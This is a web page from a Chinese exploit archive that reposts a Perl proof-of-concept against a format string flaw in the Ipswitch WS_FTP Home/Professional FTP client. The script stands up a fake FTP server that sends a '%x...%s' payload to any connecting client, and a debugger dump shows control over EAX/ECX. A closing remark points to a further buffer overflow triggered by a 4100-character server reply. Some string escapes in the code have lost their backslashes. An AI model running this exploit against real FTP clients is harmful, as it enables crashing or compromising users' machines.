手机
当前位置:查字典教程网 >网络安全 >Exploit >WS_FTP Home/Professional FTP Client Remote Format String PoC
WS_FTP Home/Professional FTP Client Remote Format String PoC
摘要:######################################################################...

##################################################################################################################

#

# Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Format String vulnerability

# Vendor : http://www.ipswitch.com/

# Affected Os : Windows *

# Risk : critical

#

# This bug is pretty interresting in the way you have to exploit it in a weird way...

#

# With this PoC you'll get a full control over EAX/ECX

# (

# eax=41414141 ebx=0000000a ecx=41414141 edx=00000000 esi=41414142 edi=02b1f0ab

# eip=77d3ef68 esp=02b1f01c ebp=02b1f064 iopl=0 nv up ei pl nz na po nc

# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

# USER32!CharLowerA 0x93:

# 77d3ef68 8a10 mov dl,[eax] ds:0023:41414141=??

# )

# Fake Server PoC :

use strict;

use Socket; my $port = shift || 21;

my $proto = getprotobyname('tcp');

my $goodz = "x41x41x41x41x41x41x41x41%x%x%x%x%x%x%x%s"; my $visitor;

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)

or die "To bad $!n";

setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1);

bind(SOCKET, pack( "S n a4 x8", AF_INET, $port, "" ))

or die "Shitz port $port is allready in use, shut down your ftp server !n";

listen(SOCKET, 5) or die "Listen: $!";

print "Fake Server started on port $portn";

while ($visitor = accept(NEW_SOCKET, SOCKET)) {

print NEW_SOCKET $goodz;

close NEW_SOCKET;

} # Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ).

【WS_FTP Home/Professional FTP Client Remote Format String PoC】相关文章:

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Mole Group Real Estate Script

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

精品推荐
分类导航